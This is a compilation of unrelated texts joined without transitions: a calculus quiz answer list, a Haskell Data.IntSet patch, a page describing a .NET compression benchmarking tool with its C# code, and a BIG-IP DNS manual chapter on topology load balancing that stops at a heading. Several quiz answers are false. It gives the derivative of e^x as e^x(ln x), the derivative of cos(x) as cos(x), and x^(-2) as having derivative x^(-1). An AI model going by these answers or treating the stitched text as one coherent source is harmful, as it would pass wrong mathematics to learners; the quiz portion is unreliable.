-> f'(x) = 5
3. Which of the following is not a power function? ->
4. For which function f(x) is f'(x) = -3x^(-4)? -> f(x) = x^(-3)
5. What is the derivative of f(x) = e^x?
-> f'(x) = e^x(ln x)
6. The slope of the function f(x) = e^x is
-> always either 0 or positive.
7. Let f(x) = 6^x. Then
-> f'(x) = 6^x(ln 6)
8. Which function f(x) has the derivative f'(x) = x^(-1)?
-> f(x) = x^(-2)
9. Let f(x) = cos(x). Then
-> f'(x) = cos(x)
10. Which function's derivative is f'(x) = sin(x)?
-> f(x) = -cos(x)
Ticket #1985: patch.txt
File patch.txt, 3.3 KB (added by dbenbenn, 8 years ago)
New patches:

[Fix bug 1985
David Benbennick <[email protected]>**20071224012920] {
hunk ./Data/IntSet.hs 547
--- | /O(min(n,W))/. Retrieves the maximal key of the set, and the set stripped from that element
+-- | /O(min(n,W))/. Retrieves the maximal key of the set, and the set stripped of that element.
hunk ./Data/IntSet.hs 550
-maxView t
- = case t of
- Bin p m l r | m < 0 -> let (result,t') = maxViewUnsigned l in return (result, bin p m t' r)
- Bin p m l r -> let (result,t') = maxViewUnsigned r in return (result, bin p m l t')
- Tip y -> return (y,Nil)
- Nil -> fail "maxView: empty set has no maximal element"
+maxView Nil = fail "maxView: empty set has no maximal element"
+maxView t = return $ deleteFindMax t
hunk ./Data/IntSet.hs 559
--- | /O(min(n,W))/. Retrieves the minimal key of the set, and the set stripped from that element
+-- | /O(min(n,W))/. Retrieves the minimal key of the set, and the set stripped of that element.
hunk ./Data/IntSet.hs 562
-minView t
- = case t of
- Bin p m l r | m < 0 -> let (result,t') = minViewUnsigned r in return (result, bin p m l t')
- Bin p m l r -> let (result,t') = minViewUnsigned l in return (result, bin p m t' r)
- Tip y -> return (y, Nil)
- Nil -> fail "minView: empty set has no minimal element"
+minView Nil = fail "minView: empty set has no minimal element"
+minView t = return $ deleteFindMin t
hunk ./Data/IntSet.hs 572
--- Duplicate the Identity monad here because base < mtl.
-newtype Identity a = Identity { runIdentity :: a }
-instance Monad Identity where
- return a = Identity a
- m >>= k = k (runIdentity m)
-
-
hunk ./Data/IntSet.hs 576
-deleteFindMin = runIdentity . minView
+deleteFindMin Nil = (error "deleteFindMin: cannot return the minimal element of an empty set", Nil)
+deleteFindMin (Tip y) = (y, Nil)
+deleteFindMin (Bin p m l r)
+ | m < 0 = let (result, t') = minViewUnsigned r in (result, bin p m l t')
+ | otherwise = let (result, t') = minViewUnsigned l in (result, bin p m t' r)
hunk ./Data/IntSet.hs 586
-deleteFindMax = runIdentity . maxView
+deleteFindMax Nil = (error "deleteFindMax: cannot return the maximal element of an empty set", Nil)
+deleteFindMax (Tip y) = (y, Nil)
+deleteFindMax (Bin p m l r)
+ | m < 0 = let (result, t') = maxViewUnsigned l in (result, bin p m t' r)
+ | otherwise = let (result, t') = maxViewUnsigned r in (result, bin p m l t')
hunk ./Data/IntSet.hs 594
-findMin = fst . runIdentity . minView
+findMin = fst . deleteFindMin
hunk ./Data/IntSet.hs 598
-findMax = fst . runIdentity . maxView
+findMax = fst . deleteFindMax
hunk ./Data/IntSet.hs 602
-deleteMin = snd . runIdentity . minView
+deleteMin = snd . deleteFindMin
hunk ./Data/IntSet.hs 606
-deleteMax = snd . runIdentity . maxView
+deleteMax = snd . deleteFindMax
}

Context:

[Fix a link in haddock docs
Ian Lynagh <[email protected]>**20071126184450]
[Fix some URLs
Ian Lynagh <[email protected]>**20071126214233]
[Add tiny regression test
David Benbennick <[email protected]>**20071113045358]
[Fix ticket 1762
David Benbennick <[email protected]>**20071111201939]
[Specify build-type: Simple
Duncan Coutts <[email protected]>**20071018125404]
[Add a boring file
Ian Lynagh <[email protected]>**20070913204647]
[TAG 2007-09-13
Ian Lynagh <[email protected]>**20070913215901]
Patch bundle hash:
ad8baf94a3c4817286c5a499d8b8e658ad874cd8
Compression Analysis Tool
A FREE TOOL FOR VISUALIZING THE PERFORMANCE OF STREAMING COMPRESSION USING YOUR DATA
Requires .NET Framework 4.5
The Compression Analysis Tool is a free benchmarking tool for the .NET Framework that lets you analyze the performance characteristics of LZF4, DEFLATE, ZLIB, GZIP, BZIP2 and LZMA and helps you discover which is the best compression method for your requirements.
You provide the data to be benchmarked and CAT produces measurements and charts with which you can compare how different compression methods and compression levels affect the compression and decompression speed and the compression ratio of your data.
Your data, your benchmarks, your choice!
Q&A
What type of questions can CAT answer?
• Which method compresses my data faster?
• Which method decompresses my data faster?
• Which method reduces the size of my data more?
• How does the compression level affect compression speed?
• How does the compression level affect decompression speed?
• How does the compression level affect compression ratio?
• Which method and level compress faster at a specific ratio?
• Which method and level decompress faster at a specific ratio?
Which comparison charts are available in CAT?
• Compression speed
• Decompression speed
• Both compression and decompression speeds
• Compressed size
• Compression speed vs compressed size, with Pareto frontier
• Decompression speed vs compressed size, with Pareto frontier
Which implementations does CAT support?
• DotNetCompression: LZF4
• DotNetCompression: DEFLATE
• DotNetCompression: ZLIB
• DotNetCompression: GZIP
• DotNetCompression: BZIP2
• DotNetCompression: LZMA
• .NET Framework: DEFLATE
• .NET Framework: GZIP
• SharpZipLib: DEFLATE
• SharpZipLib: ZLIB
• SharpZipLib: GZIP
• DotNetZip: DEFLATE
• DotNetZip: ZLIB
• DotNetZip: GZIP
What values does CAT display?
• Original size in bytes
• Compressed size in bytes
• Compressed size as percentage of original size
• Time taken to compress in milliseconds
• Time taken to decompress in milliseconds
• Compression speed in kilobytes per second
• Decompression speed in kilobytes per second
• Integrity check pass or fail
• Compression memory for LZF4/DEFLATE/ZLIB/GZIP
• Decompression memory for LZF4/DEFLATE/ZLIB/GZIP
• Window bits for DEFLATE/ZLIB/GZIP
• Memory level for DEFLATE/ZLIB/GZIP
Methodology
The Compression Analysis Tool is specially designed to accurately measure the throughput capabilities of lossless data compression implementations that conform to the streaming API of the .NET Framework.
CAT is based on the typical compression or decompression operation which involves reading the input data from a source stream, compressing or decompressing the input data to produce the output data, and writing the output data to a target stream.
To make this operation suitable for benchmarking, we must exclude the read/write overhead from the measurements and capture the full throughput of the compressor or decompressor, as described below.
Excluding the read/write overhead
When measuring the total time that the compression or decompression operation takes from beginning to end, this total time includes not only the time taken to compress or decompress the data but also the time taken to read and write the data.
In order to calculate the compressor's or decompressor's throughput without confusing it with the throughput of the read/write operations, the time taken to read and write the data must be excluded from the total time. To exclude the reading time we measure the time taken to read the input data and then deduct it from the total time. To exclude the writing time we write the output data to the null stream which consumes almost no resources.
The resulting time represents the time required by the compressor or decompressor to process the data without the overhead introduced by data read/write operations.
Measuring the full throughput
The performance of the process that is running the compression or decompression operation is affected by the execution of foreground or background processes, context switching, memory fragmentation, garbage collection, underclocking and other factors.
As a result, the measured performance is not stable but can fluctuate considerably when performing multiple passes over the same data using the same compression method. The throughput of some passes might be close to the full throughput of the compressor or decompressor for that particular data while the throughput of other passes might be significantly less than its real potential.
To minimize the effects of these factors, in each compression or decompression stage we perform multiple passes and calculate the throughput of each pass separately. At the end we select the highest throughput as being the one that is the closest to the full throughput that the implementation is capable of delivering.
Determining the number of passes
The number of passes performed in each stage is determined dynamically and depends on the time taken to compress or decompress the data being processed during that stage.
The reason for abandoning a stage that takes less than 10 ms is that its duration is insufficient for obtaining reliable measurements; the shorter the duration, the more volatile the performance becomes to the effects of external factors. We also abandon any stage that has a throughput of less than 10 KB/s as being unrealistically slow.
Core code
CAT's operation consists of four stages:
Stage 1 is always performed. Stages 2, 3 and 4 are optional and independent of each other.
Stage 1: Compress the test file and write the output to a temporary file
This is a single-pass stage during which uncompressed data is read from the input stream, compressed and written to the output stream. It returns the length of the uncompressed input stream and the length of the compressed output stream.
If only the compression ratio is required, this is the only stage that needs to be performed. If Stage 2 or 3 is performed, this stage also serves as a warm-up run.
// *********************************************************
// Compress a stream and write the output to another stream.
// *********************************************************
private void CompressToFile(
CompressionFactory compression,
int compressionLevel,
Stream uncompressedInputStream,
Stream compressedOutputStream,
ref byte[] inputBuffer,
int inputBufferSize,
out long uncompressedLength,
out long compressedLength)
{
// The source and target streams are being reused. Position their cursors at the
// beginning.
uncompressedInputStream.Position = 0;
compressedOutputStream.Position = 0;
// Create the stream that will compress the data.
compressedOutputStream = compression.CreateOutputStream(compressedOutputStream, compressionLevel, true);
// Read from the source stream as many bytes as the input buffer can hold.
// Process them and write the output to the target stream.
int bytesRead;
while ((bytesRead = uncompressedInputStream.Read(inputBuffer, 0, inputBufferSize)) > 0)
{
compressedOutputStream.Write(inputBuffer, 0, bytesRead);
}
// Close the target stream so that data remaining in the inputBuffer are written out.
compressedOutputStream.Close();
// Assign the size of the data before and after compression.
uncompressedLength = uncompressedInputStream.Length;
compressedLength = compressedOutputStream.Length;
}
Stage 2: Compress the test file and write the output to the null stream
This is a multi-pass stage during which uncompressed data is read from the input stream, compressed and written to the null stream. It returns the time taken to compress the data after subtracting from it the time taken to read the data.
This stage is performed only if the compression throughput is required. If this stage is performed, the number of passes to be made will be determined dynamically depending on the time taken to compress the particular data being processed during this stage.
// ***********************************************
// Compress a stream and write the output to null.
// ***********************************************
private void CompressToNull(
CompressionFactory compression,
int compressionLevel,
Stream uncompressedInputStream,
ref byte[] inputBuffer,
int inputBufferSize,
out decimal processingTime)
{
// The source stream is being reused. Position its cursor at the beginning.
uncompressedInputStream.Position = 0;
// To ensure that our measurements do not include the time spent reading data from
// the source, we read from the source using our ByteCounterStream that enables us to
// measure the reading time so that at the end we can deduct it from the total time.
var byteCounter = new ByteCounterStream(uncompressedInputStream, null);
uncompressedInputStream = byteCounter;
// Reset the byteCounter in order to zero the ReadTime accumulated up to now.
// We must start accumulating ReadTime only after the stopwatch is started.
// Otherwise our calculations will be wrong and result in negative processing times
// for very small files.
byteCounter.Reset();
// To ensure that our measurements do not include the time spent writing data to the
// target, we assign the target to a null stream which does not consume any resources.
Stream compressedOutputStream = Stream.Null;
// Create a stopwatch and start it.
Stopwatch processingStopwatch = new Stopwatch();
processingStopwatch.Start();
// Create the stream that will compress the data.
compressedOutputStream = compression.CreateOutputStream(compressedOutputStream, compressionLevel, false);
// Read from the source stream as many bytes as the input buffer can hold.
// Process them and write the output to the target stream.
int bytesRead;
while ((bytesRead = uncompressedInputStream.Read(inputBuffer, 0, inputBufferSize)) > 0)
{
compressedOutputStream.Write(inputBuffer, 0, bytesRead);
}
// Close the target stream so that data remaining in the inputBuffer are written out.
compressedOutputStream.Close();
// Stop the stopwatch.
// Calculate the processing time by substracting the read time from the elapsed time.
processingStopwatch.Stop();
processingTime = (decimal)(processingStopwatch.Elapsed.TotalMilliseconds - byteCounter.ReadTime.TotalMilliseconds);
}
Stage 3: Decompress the temporary file and write the output to the null stream
This is a multi-pass stage during which compressed data is read from the input stream, decompressed and written to the null stream. It returns the time taken to decompress the data after subtracting from it the time taken to read the data.
This stage is performed only if the decompression throughput is required. If this stage is performed, the number of passes to be made will be determined dynamically depending on the time taken to decompress the particular data being processed during this stage.
// *************************************************
// Decompress a stream and write the output to null.
// *************************************************
private void DecompressToNull(
CompressionFactory compression,
Stream compressedInputStream,
ref byte[] inputBuffer,
int inputBufferSize,
out decimal processingTime)
{
// The source stream is being reused. Position its cursor at the beginning.
compressedInputStream.Position = 0;
// To ensure that our measurements do not include the time spent reading data from
// the source, we read from the source using our ByteCounterStream that enables us to
// measure the reading time so that at the end we can deduct it from the total time.
var byteCounter = new ByteCounterStream(compressedInputStream, null);
compressedInputStream = byteCounter;
// Reset the byteCounter in order to zero the ReadTime accumulated up to now.
// We must start accumulating ReadTime only after the stopwatch is started.
// Otherwise our calculations will be wrong and result in negative processing times
// for very small files.
byteCounter.Reset();
// To ensure that our measurements do not include the time spent writing data to the
// target, we assign the target to a null stream which does not consume any resources.
Stream decompressedInputStream = Stream.Null;
// Create a stopwatch and start it.
Stopwatch processingStopwatch = new Stopwatch();
processingStopwatch.Start();
// Create the stream that will decompress the data.
compressedInputStream = compression.CreateInputStream(compressedInputStream, true);
// Read from the source stream as many bytes as the input buffer can hold.
// Process them and write the output to the target stream.
int bytesRead;
while ((bytesRead = compressedInputStream.Read(inputBuffer, 0, inputBufferSize)) > 0)
{
decompressedInputStream.Write(inputBuffer, 0, bytesRead);
}
// Close the target stream so that data remaining in the inputBuffer are written out.
decompressedInputStream.Close();
// Stop the stopwatch.
// Calculate the processing time by substracting the read time from the elapsed time.
processingStopwatch.Stop();
processingTime = (decimal)(processingStopwatch.Elapsed.TotalMilliseconds - byteCounter.ReadTime.TotalMilliseconds);
}
Stage 4: Decompress the temporary file and check its integrity
This is a single-pass stage during which uncompressed data is read from one input stream, compressed data is read from another input stream and decompressed, and the two of them are compared to confirm that they are identical.
This stage is performed only if integrity checking is required.
// **********************************************************************************************
// Decompress a compressed stream and compare its contents with those of the uncompressed stream.
// **********************************************************************************************
private void DecompressAndCheckIntegrity(
CompressionFactory compression,
Stream uncompressedInputStream,
Stream compressedInputStream,
ref byte[] compressedInputBuffer,
int compressedInputBufferSize,
out bool success)
{
// The two source streams are being reused. Position their cursors at the beginning.
uncompressedInputStream.Position = 0;
compressedInputStream.Position = 0;
// Create the stream that will decompress the data.
compressedInputStream = compression.CreateInputStream(compressedInputStream, true);
// Decompress the compressed data and confirm it is the same as the uncompressed data.
int decompressedBytesRead = 0;
int uncompressedBytesRead = 0;
byte[] uncompressedInputBuffer = new byte[compressedInputBuffer.Length];
success = true;
while ((decompressedBytesRead = compressedInputStream.Read(compressedInputBuffer, 0, compressedInputBufferSize)) > 0)
{
do
{
uncompressedBytesRead = uncompressedInputStream.Read(uncompressedInputBuffer, 0, decompressedBytesRead);
for (int i = 0; i < uncompressedBytesRead; i++)
{
success = success && (uncompressedInputBuffer[i] == compressedInputBuffer[i]);
}
decompressedBytesRead -= uncompressedBytesRead;
} while (success && (decompressedBytesRead > 0));
};
// There are no more compressed bytes left to read. Check that there are also no more
// uncompressed bytes left to read.
uncompressedBytesRead = uncompressedInputStream.Read(uncompressedInputBuffer, 0, compressedInputBufferSize);
success = success && (uncompressedBytesRead == 0);
}
Screenshots
Charts included with the article (thumbnail images omitted here):
Compression speed of different compression methods and levels
Decompression speed of different compression methods and levels
Compressed size of different compression methods and levels
Compression and decompression speed of different compression methods and levels
Compression speed vs compressed size of different compression methods and levels, with Pareto frontier
Decompression speed vs compressed size of different compression methods and levels, with Pareto frontier
Manual Chapter : Using Topology Load Balancing to Distribute DNS Requests to Specific Resources
Applies To:
Show Versions Show Versions
BIG-IP DNS
• 14.0.0
Manual Chapter
Using Topology Load Balancing to Distribute DNS Requests to Specific Resources
How do I configure BIG-IP DNS to load balance DNS requests to specific resources?
You can configure BIG-IP® DNS to load balance DNS requests to a resource based on the physical proximity of the resource to the client making the request. You can also configure BIG-IP DNS to deliver region-specific content, such as news and weather, to a client making a request from a specific location.
You can accomplish this by configuring BIG-IP DNS to perform Topology load balancing.
About Topology load balancing
Topology load balancing distributes DNS name resolution requests based on the proximity of the client to the data center housing the resource that responds to the request. When Topology load balancing is enabled, the BIG-IP® system uses topology records to make load balancing decisions.
Understanding topology records
A topology record is a set of characteristics that maps the origin of a DNS name resolution request to a destination. Each topology record contains the following elements:
• A request source statement that specifies the origin LDNS of a DNS request.
• A destination statement that specifies the pool or pool member to which the weight of the topology record will be assigned.
• A weight that the BIG-IP® system assigns to a pool or a pool member during the load balancing process.
Note: In tmsh, the weight parameter is called score.
Understanding user-defined regions
A region is a customized collection of topologies that defines a specific geographical location that has meaning for your network. For example, you can create two custom regions named Region_east and Region_west. Region_east includes the states on the east coast of the United States; Region_west includes the states on the west coast of the United States. Then, you can use those custom regions as the Request Source or Destination of a topology record you create.
This table describes how the use of topology regions improves the load-balancing performance of the BIG-IP® system.
Faster load balancing configuration Slower load balancing configuration
2 data centers 2 data centers
1000 pool members in each data center 1000 pool members in each data center
2 regions with 5000 CIDR entries each
2 topology records: 10,000 topology records:
1 entry routes all requests from Region_east to data center1 5000 CIDR topology records route requests to data center1
1 entry routes all requests from Region_west to data center2 5000 CIDR topology records route requests to data center2
Creating a region for Topology load balancing
Create regions to customize the Topology load balancing capabilities of the BIG-IP system. For example, you can create two regions to represent the data centers in your network: dc1_pools and dc2_pools. Alternatively, you can create a region to which you can add IP subnets as you expand your network. Then, when you create a topology record, you can use the custom regions as the Request Source or Destination of the record.
1. On the Main tab, click DNS > GSLB > Topology > Regions .
2. Click Create.
The new record screen opens.
3. In the Name field, type a unique identifier for the region.
4. To add members to the region, do the following for each member you want to add to the region:
1. From the Member Type list, select a type of identifier.
2. Select an operator, either is or is not.
3. From the Continent list, select the continent that contains the locations in the region you are creating.
4. Click Add.
5. Click Create.
You can now create a topology record using the custom region you created.
Understanding how the BIG-IP system prioritizes topology records
When Topology load balancing is configured, the order of the topology records is vital and affects how the BIG-IP® system scores the pools or pool members to which it load balances DNS name resolution requests. By default, the BIG-IP system prioritizes topology records using Longest Match sorting. As a result, topology records are automatically sorted based on a specific criteria each time the BIG-IP system configuration loads. Alternatively, you can disable Longest Match sorting and customize the order of the topology records in the list.
Understanding Longest Match topology record sorting
When Longest Match is enabled, the BIG-IP® system sorts the topology records by the LDNS request source statement, the destination statement, and the weight of the record.
The system first sorts the topology records by the type of LDNS request source statement using this order from highest to lowest:
1. IP subnet in CIDR format (the system places the most specific IP subnet at the top of the list; for example, 10.15.1.1/32, 10.15.1.0/24, 10.15.0.0/16, 10.0.0.0/8)
2. Region
3. ISP
4. State
5. Country
6. Continent
7. LDNS Request Source negation (record that excludes an LDNS)
8. Wildcard record (the system sorts the wildcard record to the bottom of the list, because this record is the least specific)
If the type of LDNS request source statement is the same in multiple topology records, the BIG-IP system then sorts these records by the type of destination statement using this order from highest to lowest:
1. IP subnet in CIDR format (the system places the most specific IP subnet at the top of the list; for example, 10.15.1.1/32, 10.15.1.0/24, 10.15.0.0/16, 10.0.0.0/8)
2. Data center
3. Pool
4. Region (customized collection of criteria)
5. ISP
6. State
7. Country
8. Continent
9. Destination negation (record that excludes a destination)
10. Wildcard record (the system sorts the wildcard to the bottom of the list, because this record is the least specific)
If the type of LDNS request source statement is the same in multiple topology records and the type of destination statement is the same in those records, the system then uses the value of the weight from highest to lowest to sort the records.
The example shows a list of topology records sorted automatically using Longest Match. Note that the fourth and fifth records have the same LDNS subnet and the destinations are both of type State. Therefore, the weight determines the position in the list; thus, the record with the highest weight is first.
1. ldns: subnet 192.168.69.133/32 destination: subnet 10.15.1.1/32 weight: 500
2. ldns: subnet 192.168.69.133/32 destination: datacenter /Common/NorthAmerica weight: 400
3. ldns: subnet 192.168.69.0/24 destination: pool /Common/NorthAmerica weight 300
4. ldns: subnet 192.168.0.0/16 destination: state NY weight 200
5. ldns: subnet 192.168.0.0/16 destination: state WA weight 100
Customizing the sort order of topology records
Determine the order in which you want the topology records you create to be sorted.
Change the sort order of the topology records when you do not want the system to use the Longest Match sort order.
1. On the Main tab, click DNS > GSLB > Topology > Records .
2. Click the Change Order button.
3. Clear the Longest Match check box.
4. To change the order of the records in the Topology Record List, do the following:
1. From the list, select a topology record.
2. Click the Up or Down button to move the record to the preferred position in the list.
5. Click Update.
The BIG-IP system uses the customized Topology Record List for topology load balancing.
Important: The BIG-IP system saves only one set of ordered topology records; if you re-enable Longest Match, your custom ordering will no longer be available.
Configuring Longest Match
Ensure that topology records exist in the configuration.
Configure the BIG-IP system to order the topology records using Longest Match.
1. On the Main tab, click DNS > GSLB > Topology > Records .
2. Click the Change Order button.
3. Select the Longest Match check box.
4. Click Update.
The BIG-IP system uses Longest Match sorting to order the topology records in a list.
Creating a topology record
Before you create topology records, it is essential that you understand how the system sorts the topology record list. Additionally, you must understand how the system uses the ordered list of records to assign scores to the pools or pool members, to which the BIG-IP system load balances DNS requests.
Create topology records that instruct the BIG-IP system where to route DNS name resolution requests when Topology load balancing is enabled.
Tip: The BIG-IP system is more efficient when using regions for Topology load balancing.
1. On the Main tab, click DNS > GSLB > Topology .
2. Click Create.
The new record screen opens.
3. To create an LDNS request source statement, use the Request Source settings:
1. Select an origin type from the first list.
2. Select an operator, either is or is not.
3. Define the criteria for the request source statement based on the request source type you selected.
4. To create a destination (server object) statement, use the Destination settings:
1. Select a destination type from the first list.
2. Select an operator, either is or is not.
3. Define the criteria for the destination statement based on the destination type you selected.
5. In the Weight field, specify the priority of this record.
6. Click Create.
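If you prefer to manage records from the command line, a roughly equivalent record can be created in tmsh. Treat the following as a sketch only: the subnet, pool name, and score are illustrative values, and the exact record syntax and attribute names should be confirmed against the tmsh reference for your BIG-IP version.
create gtm topology ldns: subnet 11.1.0.0/16 server: pool /Common/Pool1 score 100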
Deleting a topology record
Delete existing topology records as your network changes. For example, when you add a new data center to your network, the topology records that the BIG-IP system uses to distribute DNS name resolution requests can become obsolete, requiring deletion.
Note: You cannot modify topology records; you can delete records and create new ones that meet your needs.
1. On the Main tab, click DNS > GSLB > Topology .
2. Select the topology record that you want to remove from the topology records list by selecting the corresponding Select check box.
3. Click Delete.
A confirmation screen appears.
4. Click Delete.
About Topology load balancing for a wide IP
When you use the topology load balancing method at a wide IP level with topology records that have a Data Center destination, the topology records have no effect. (This is because load balancing at a wide IP level selects between GTM pools, and GTM pools do not have a data center associated with them.) Topology records that have a Data Center destination have an effect only when using the topology load balancing method at the pool level.
Example configuration: Topology load balancing for a wide IP
This example illustrates how DNS name resolution requests are load balanced when a wide IP is configured for Topology load balancing. An administrator configures the wide IP www.siterequest.net for Topology load balancing. The wide IP contains three pools: Pool1 and Pool3 are located in the North America data center; Pool2 is located in the South America data center. Next, the administrator creates topology records, as shown in this figure, and ensures that Longest Match is enabled on the BIG-IP® system.
Topology records for a wide IP configured for Topology load balancing
Topology records for a wide IP configured for Topology load balancing
The first topology record directs all DNS name resolution requests from an LDNS in the IP subnet 11.1.0.0/16 to Pool1. The second topology record directs all DNS name resolution requests from an LDNS in the IP subnet 10.1.0.0/16 to Pool2. The third topology record is the least specific. It directs DNS name resolution requests from an LDNS in any IP subnet to Pool3. However, it is important to note that the weight of the third topology record is lower than the weights of the other topology records.
Topology load balancing at the wide IP-level
BIG-IP system load balancing DNS requests using a wide IP configured for Topology load balancing
1. A client in New York makes a DNS request.
2. LDNS 11.1.0.1 queries the BIG-IP system in the North America data center.
3. The BIG-IP system directs the LDNS to Pool1. To determine this answer, for each pool, one at a time, the BIG-IP system iterates through the list of three topology records to find a match. Pool1 matches the first topology record in the list, because both the LDNS request source (11.1.0.1) and the Destination (Pool1) of the DNS request match the first topology record; therefore, the BIG-IP system assigns a score of 100 to Pool1. For Pool2, there is no matching topology record that contains both the LDNS request source (11.1.0.1) and the Destination (Pool2); therefore, the BIG-IP system assigns a score of zero to Pool2. Pool3 matches the third topology record in the list, because both the LDNS request source (11.1.0.1) and the Destination (Pool3) of the DNS request match the third topology record; therefore, the BIG-IP system assigns a score of 10 to Pool3. The BIG-IP system directs the LDNS to send the request to the pool with the highest score.
4. The LDNS sends the DNS request to Pool1 in the North America data center. How the system distributes the DNS requests to the members of Pool1 is not depicted in this illustration, but is based on the load balancing method configured for Pool1.
5. A client in Lima makes a DNS request.
6. LDNS 10.1.0.1 queries the BIG-IP system in the North America data center.
7. The BIG-IP system directs the LDNS to Pool2. To determine this answer, for each pool, one at a time, the BIG-IP system iterates through the list of three topology records to find a match. For Pool1, there is no matching topology record that contains both the LDNS request source (10.1.0.1) and the Destination (Pool1); therefore, the BIG-IP system assigns a score of zero to Pool1. Pool2 matches the second topology record in the list, because both the LDNS request source (10.1.0.1) and the Destination (Pool2) of the DNS request match the second topology record; therefore, the BIG-IP system assigns a score of 100 to Pool2. Pool3 matches the third topology record in the list, because both the LDNS request source (10.1.0.1) and the Destination (Pool3) of the DNS request match the third topology record; therefore, the BIG-IP system assigns a score of 10 to Pool3. The BIG-IP system directs the LDNS to send the request to the pool with the highest score.
8. The LDNS sends the DNS request to Pool2 in the South America data center. How the system distributes the DNS requests to the members of Pool2 is not shown in this illustration, but is based on the load balancing method configured for Pool2.
9. A client in Chicago makes a DNS request.
10. LDNS 12.1.0.1 queries the BIG-IP system in the North America data center.
11. The BIG-IP system directs the LDNS to Pool3. To determine this answer, for each pool, one at a time, the BIG-IP system iterates through the list of three topology records to find a match. For Pool1, there is no matching topology record that contains both the LDNS request source (12.1.0.1) and the Destination (Pool1); therefore, the BIG-IP system assigns a score of zero to Pool1. For Pool2, there is no matching topology record that contains both the LDNS request source (12.1.0.1) and the Destination (Pool2); therefore, the BIG-IP system assigns a score of zero to Pool2. Pool3 matches the third topology record in the list, because both the LDNS request source (12.1.0.1) and the Destination (Pool3) of the DNS request match the third topology record; therefore, the BIG-IP system assigns a score of 10 to Pool3. The BIG-IP system directs the LDNS to send the request to the pool with the highest score.
12. The LDNS sends the DNS request to Pool3 in the North America data center. How the system distributes the DNS requests to the members of Pool3 is not depicted in this illustration, but is based on the load balancing method configured for Pool3.
Configuring a wide IP for Topology load balancing
Before you configure a wide IP for Topology load balancing, ensure the following:
• At least two pools are associated with the wide IP that you are configuring for Topology load balancing.
• Topology records that define how you want the BIG-IP system to load balance DNS name resolution requests are configured.
You can use Topology load balancing to distribute DNS name resolution requests among the pools in a wide IP based on the geographic location of both the client making the request and the pool that handles the response.
1. On the Main tab, click DNS > GSLB > Wide IPs .
The Wide IP List screen opens.
2. Click the name of the wide IP you want to modify.
3. On the menu bar, click Pools.
4. From the Load Balancing Method list, select Topology.
5. Click Update.
Repeat this process for each wide IP that you want to configure for Topology load balancing.
About Topology load balancing for a pool
When you configure a pool for Topology load balancing, you can route DNS requests to the data center that is closest to the client making the request. With this configuration, the BIG-IP® system load balances DNS name resolution requests to the members of the pool.
Example configuration: Topology load balancing for a pool
This example illustrates how DNS name resolution requests are load balanced when a pool is configured for Topology load balancing. An administrator configures pools in two different data centers: the North America data center (North America DC) and the South America data center (South America DC) for Topology load balancing. A server that contains the pool members 10.10.10.1 - 10.10.10.3 resides in the North America DC. The server that contains the pool members 11.10.10.1 - 11.10.10.3 resides in the South America DC. Next, the administrator creates topology records, as shown in the following figure, to load balance DNS requests to members of the pools, and ensures that Longest Match is enabled on the BIG-IP® system.
Topology record that the Global Traffic Manager uses to direct these connection requests
Topology records for a pool configured for Topology load balancing
The first topology record directs all DNS name resolution requests from an LDNS in Bolivia to the South America DC. The second topology record directs all DNS name resolution requests from an LDNS in Peru to the South America DC. The third topology record directs all DNS name resolution requests from an LDNS in the United States to the North America DC. The fourth topology record directs all DNS name resolution requests from an LDNS in Canada to the North America DC.
Topology load balancing at the pool level
Pool configured for Topology load balancing
1. A client in the U.S. makes a DNS request.
2. An LDNS in the U.S. queries the BIG-IP system in the North America DC.
3. The BIG-IP system directs the LDNS to a member of Pool1 in the North America DC. To determine this answer, for each pool member, one at a time, the BIG-IP system iterates through the list of topology records to find a match. Pool members 10.10.10.1 - 10.10.10.3 each match the third topology record in the list, because both the LDNS request source (U.S.) and the Destination (North America DC) of the DNS request match the third topology record; therefore, the BIG-IP system assigns a score of 20 to each of those pool members. For each of the pool members 11.10.10.1 - 11.10.10.3, there is no matching topology record that contains both the LDNS request source (U.S.) and the Destination (South America DC); therefore, the BIG-IP system assigns a score of zero to each of those pool members. The BIG-IP system directs the LDNS to send the request to the pool member with the highest score.
4. The LDNS sends the DNS request to a pool member in the North America DC. Because all of the pool members in the North America DC have the same score, the system distributes the DNS requests to the pool members in a round robin fashion.
5. A client in Bolivia makes a DNS request.
6. An LDNS in Bolivia queries the BIG-IP system in the North America DC.
7. The BIG-IP system directs the LDNS to a pool member in the South America DC. To determine this answer, for each pool member, one at a time, the BIG-IP system iterates through the list of topology records to find a match. For each of the pool members 10.10.10.1 - 10.10.10.3 there is no matching topology record that contains both the LDNS request source (Bolivia) and the Destination (North America DC); therefore, the BIG-IP system assigns a score of zero to each of those pool members. Pool members 11.10.10.1 - 11.10.10.3 each match the first topology record in the list, because both the LDNS request source (Bolivia) and the Destination (South America DC) of the DNS request match the first topology record; therefore, the BIG-IP system assigns a score of 10 to each of those pool members. The BIG-IP system directs the LDNS to send the request to the pool member with the highest score.
8. The LDNS sends the DNS request to a pool member in the South America DC. Because all of the pool members in the South America DC have the same score, the system distributes the DNS requests to the pool members in a round robin fashion.
Configuring a pool for Topology load balancing
Before you configure a pool for Topology load balancing, ensure the following:
• The pool you are configuring for Topology load balancing contains at least two pool members.
• Topology records that define how you want the BIG-IP system to load balance DNS name resolution requests are configured.
You can use Topology load balancing to distribute DNS name resolution requests among the members of a pool based on the geographic location of both the client making the request and the member of the pool that handles the response.
1. On the Main tab, click DNS > GSLB > Pools .
The Pools list screen opens.
2. Click the name of the pool you want to modify.
3. On the menu bar, click Members.
4. In the Load Balancing Method area, from the Preferred list, select Topology.
5. In the Load Balancing Method area, from the Alternate list, select Round Robin.
6. In the Load Balancing Method area, from the Fallback list, select None.
7. Click Update.
Repeat this process for each pool that you want to configure for Topology load balancing.
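For administrators who script this step, a rough tmsh equivalent of the settings above is shown below. This is a sketch only: the pool name is illustrative, and the pool type keyword (for example, a for an A-type pool) and attribute names can vary by BIG-IP version, so verify them against the tmsh reference for your release.
modify gtm pool a Pool1 load-balancing-mode topology alternate-mode round-robin fallback-mode none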
About Topology load balancing for both wide IPs and pools
You can configure a wide IP for Topology load balancing. You can also configure each pool in the wide IP for Topology load balancing. When you configure both a wide IP and the pools in the wide IP for Topology load balancing, the BIG-IP® system uses topology records to load balance DNS name resolution requests first to a pool in the wide IP, and then, to a member of the pool.
Note:
When configuring both the wide IP and the pools in the wide IP for Topology load balancing, it is important to set the Fallback load balancing method for each pool to None. If you do not, DNS can send a DNS request to a pool in the wide IP even when no pool members are available. In this case, the load balancing algorithm for the pool would then fall back to BIND (static DNS). When you set the Fallback load balancing method for each pool to None, if no members of a pool are available, BIG-IP DNS sends the DNS request to another pool in the wide IP.
About Topology load balancing for CNAME wide IPs and pools
